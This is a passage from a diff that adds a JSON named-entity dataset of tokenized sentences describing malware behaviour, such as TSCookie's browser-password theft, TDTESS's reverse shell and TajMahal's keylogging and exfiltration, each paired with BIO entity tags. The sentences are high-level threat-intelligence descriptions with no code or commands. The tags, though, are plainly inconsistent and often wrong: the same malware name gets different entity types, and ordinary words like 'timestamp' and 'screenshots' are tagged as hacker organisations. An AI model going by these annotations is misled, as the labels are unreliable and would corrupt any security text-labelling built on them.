"O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "TAINTEDSCRIBE", + "command", + "and", + "execution", + "module", + "can", + "perform", + "target", + "system", + "enumeration." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "uses", + "a", + "Linear", + "Feedback", + "Shift", + "Register", + "(LFSR)", + "algorithm", + "for", + "network", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "use", + "<code>DriveList</code>", + "to", + "retrieve", + "drive", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "execute", + "<code>GetLocalTime</code>", + "for", + "time", + "discovery." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "change", + "the", + "timestamp", + "of", + "specified", + "filenames." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "enable", + "Windows", + "CLI", + "access", + "and", + "execute", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TDTESS", + "creates", + "then", + "deletes", + "log", + "files", + "during", + "installation", + "of", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TDTESS", + "has", + "a", + "command", + "to", + "download", + "and", + "execute", + "an", + "additional", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "creating", + "a", + "new", + "service", + "for", + "persistence,", + "TDTESS", + "sets", + "the", + "file", + "creation", + "time", + "for", + "the", + "service", + "to", + "the", + "creation", + "time", + "of", + "the", + "victim's", + "legitimate", + "svchost.exe", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TDTESS", + "provides", + "a", + "reverse", + "shell", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "running", + "as", + "administrator,", + "TDTESS", + "installs", + "itself", + "as", + "a", + "new", + "service", + "named", + "bmwappushservice", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "was", + "decoded", + "using", + "a", + "custom", + "rolling", + "XOR", + "algorithm", + "to", + "execute", + "a", + "customized", + "Cobalt", + "Strike", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "files", + "had", + "names", + "that", + "resembled", + "legitimate", + "Window", + "file", + "and", + "directory", + "names." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "modified", + "the", + "Registry", + "to", + "create", + "a", + "Windows", + "service", + "for", + "itself", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "created", + "and", + "read", + "from", + "a", + "file", + "with", + "a", + "fake", + "JPG", + "header,", + "and", + "its", + "payload", + "was", + "encrypted", + "with", + "a", + "simple", + "rotating", + "XOR", + "cipher." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "checked", + "that", + "<code>HKU\\SOFTWARE\\Microsoft\\CTF</code>", + "existed", + "before", + "decoding", + "its", + "embedded", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEARDROP", + "ran", + "as", + "a", + "Windows", + "service", + "from", + "the", + "<code>c:\\windows\\syswow64</code>", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEXTMATE", + "uses", + "DNS", + "TXT", + "records", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TEXTMATE", + "executes", + "cmd.exe", + "to", + "provide", + "a", + "reverse", + "shell", + "to", + "adversaries." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "a", + "document", + "is", + "found", + "matching", + "one", + "of", + "the", + "extensions", + "in", + "the", + "configuration,", + "TINYTYPHON", + "uploads", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TINYTYPHON", + "has", + "used", + "XOR", + "with", + "0x90", + "to", + "obfuscate", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TINYTYPHON", + "searches", + "through", + "the", + "drive", + "containing", + "the", + "OS,", + "then", + "all", + "drive", + "letters", + "C", + "through", + "to", + "Z,", + "for", + "documents", + "matching", + "certain", + "extensions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TINYTYPHON", + "installs", + "itself", + "under", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "steal", + "saved", + "passwords", + "from", + "the", + "Internet", + "Explorer,", + "Edge,", + "Firefox,", + "and", + "Chrome", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "decrypt,", + "load,", + "and", + "execute", + "a", + "DLL", + "and", + "its", + "resources." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "discover", + "drive", + "information", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "been", + "executed", + "via", + "malicious", + "links", + "embedded", + "in", + "e-mails", + "spoofing", + "the", + "Ministries", + "of", + "Education,", + "Culture,", + "Sports,", + "Science", + "and", + "Technology", + "of", + "Japan." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "B-Idus", + "B-Idus", + "O", + "B-Idus", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "TSCookie", + "can", + "use", + "ICMP", + "to", + "receive", + "information", + "on", + "the", + "destination", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "list", + "processes", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "inject", + "code", + "into", + "the", + "svchost.exe,", + "iexplorer.exe,", + "explorer.exe,", + "and", + "default", + "browser", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Way", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "proxy", + "communications", + "with", + "command", + "and", + "control", + "(C2)", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "encrypted", + "network", + "communications", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "identify", + "the", + "IP", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "can", + "multiple", + "protocols", + "including", + "HTTP", + "and", + "HTTPS", + "in", + "communication", + "with", + "command", + "and", + "control", + "(C2)", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TSCookie", + "has", + "the", + "ability", + "to", + "execute", + "shell", + "commands", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "injecting", + "code", + "into", + "the", + "APC", + "queue", + "of", + "a", + "created", + "Rundll32", + "process", + "as", + "part", + "of", + "an", + "\"Early", + "Bird", + "injection.\"" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "downloading", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "writing", + "to", + "a", + "Registry", + "Run", + "key", + "to", + "establish." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "taking", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "gathering", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TURNEDUP", + "is", + "capable", + "of", + "creating", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "TYPEFRAME", + "variant", + "decrypts", + "an", + "archive", + "using", + "an", + "RC4", + "key,", + "then", + "decompresses", + "and", + "installs", + "the", + "decrypted", + "malicious", + "DLL", + "module.", + "Another", + "variant", + "decodes", + "the", + "embedded", + "file", + "by", + "XORing", + "it", + "with", + "the", + "value", + "\"0x35\"." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "open", + "the", + "Windows", + "Firewall", + "on", + "the", + "victim’s", + "machine", + "to", + "allow", + "incoming", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APIs", + "and", + "strings", + "in", + "some", + "TYPEFRAME", + "variants", + "are", + "RC4", + "encrypted.", + "Another", + "variant", + "is", + "encoded", + "with", + "XOR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "delete", + "files", + "off", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "search", + "directories", + "for", + "files", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "install", + "and", + "store", + "encrypted", + "configuration", + "data", + "under", + "the", + "Registry", + "key", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", + "and", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "upload", + "and", + "download", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Word", + "document", + "delivering", + "TYPEFRAME", + "prompts", + "the", + "user", + "to", + "enable", + "macro", + "execution." + ], + "ner_tags": [ + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "install", + "encrypted", + "configuration", + "data", + "under", + "the", + "Registry", + "key", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", + "and", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "has", + "used", + "ports", + "443,", + "8080,", + "and", + "8443", + "with", + "a", + "FakeTLS", + "method." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "A", + "TYPEFRAME", + "variant", + "can", + "force", + "the", + "compromised", + "system", + "to", + "function", + "as", + "a", + "proxy", + "server." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "gather", + "the", + "disk", + "volume", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "has", + "used", + "a", + "malicious", + "Word", + "document", + "for", + "delivery", + "with", + "VBA", + "macros", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "can", + "uninstall", + "malware", + "components", + "using", + "a", + "batch", + "script.", + "TYPEFRAME", + "can", + "execute", + "commands", + "using", + "a", + "shell." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "I-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "TYPEFRAME", + "variants", + "can", + "add", + "malicious", + "DLL", + "modules", + "as", + "new", + "services.TYPEFRAME", + "can", + "also", + "delete", + "services", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "upload", + "data", + "and", + "files", + "from", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "a", + "stream", + "cipher", + "to", + "decrypt", + "stings", + "used", + "by", + "the", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "perform", + "DLL", + "loading." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "encrypted", + "string", + "blocks", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "<code>DeleteFileA</code>", + "to", + "remove", + "files", + "from", + "infected", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "search", + "for", + "specific", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "downloaded", + "additional", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "relied", + "upon", + "a", + "victim", + "to", + "click", + "on", + "a", + "malicious", + "email", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "the", + "ability", + "to", + "modify", + "the", + "Registry", + "on", + "compromised", + "hosts", + "using", + "<code>RegDeleteValueA</code>", + "and", + "<code>RegCreateKeyExA</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "the", + "ability", + "to", + "use", + "native", + "APIs", + "for", + "execution", + "including", + "<code>GetProcessHeap</code>,", + "<code>GetProcAddress</code>,", + "and", + "<code>LoadLibrary</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "TCP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "<code>GetCurrentProcessId</code>", + "for", + "process", + "discovery." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "query", + "the", + "Registry", + "on", + "compromised", + "hosts", + "using", + "<code>RegQueryValueExA</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "modified", + "the", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "been", + "delivered", + "through", + "spearphishing", + "emails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "uses", + "RC4", + "to", + "encrypt", + "the", + "message", + "body", + "of", + "HTTP", + "content." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "collected", + "the", + "MAC", + "address", + "of", + "a", + "compromised", + "host;", + "it", + "can", + "also", + "use", + "<code>GetAdaptersInfo</code>", + "to", + "identify", + "network", + "adapters." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "use", + "<code>GetLocalTime</code>", + "and", + "<code>GetSystemTime</code>", + "to", + "collect", + "system", + "time." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "has", + "used", + "HTTP", + "GET", + "and", + "POST", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Taidoor", + "can", + "copy", + "cmd.exe", + "into", + "the", + "system", + "temp", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "use", + "the", + "open", + "source", + "libraries", + "XZip/Xunzip", + "and", + "zlib", + "to", + "compress", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "capture", + "VoiceIP", + "application", + "audio", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "index", + "and", + "compress", + "files", + "into", + "a", + "send", + "queue", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "manage", + "an", + "automated", + "queue", + "of", + "egress", + "files", + "and", + "commands", + "sent", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "steal", + "data", + "from", + "the", + "clipboard", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "steal", + "documents", + "from", + "the", + "local", + "system", + "including", + "the", + "print", + "spooler", + "queue." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "steal", + "written", + "CD", + "images", + "and", + "files", + "of", + "interest", + "from", + "previously", + "connected", + "removable", + "drives", + "when", + "they", + "become", + "available", + "again." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "inject", + "DLLs", + "for", + "malicious", + "plugins", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "send", + "collected", + "files", + "over", + "its", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "index", + "files", + "from", + "drives,", + "user", + "profiles,", + "and", + "removable", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "capture", + "keystrokes", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "can", + "set", + "the", + "<code>KeepPrintedJobs</code>", + "attribute", + "for", + "configured", + "printers", + "in", + "<code>SOFTWARE\\\\Microsoft\\\\Windows", + "NT\\\\CurrentVersion\\\\Print\\\\Printers</code>", + "to", + "enable", + "document", + "stealing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "used", + "an", + "encrypted", + "Virtual", + "File", + "System", + "to", + "store", + "plugins." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "connected", + "Apple", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Exp", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "running", + "processes", + "and", + "associated", + "plugins", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "take", + "screenshots", + "on", + "an", + "infected", + "host", + "including", + "capturing", + "content", + "from", + "windows", + "of", + "instant", + "messaging", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + 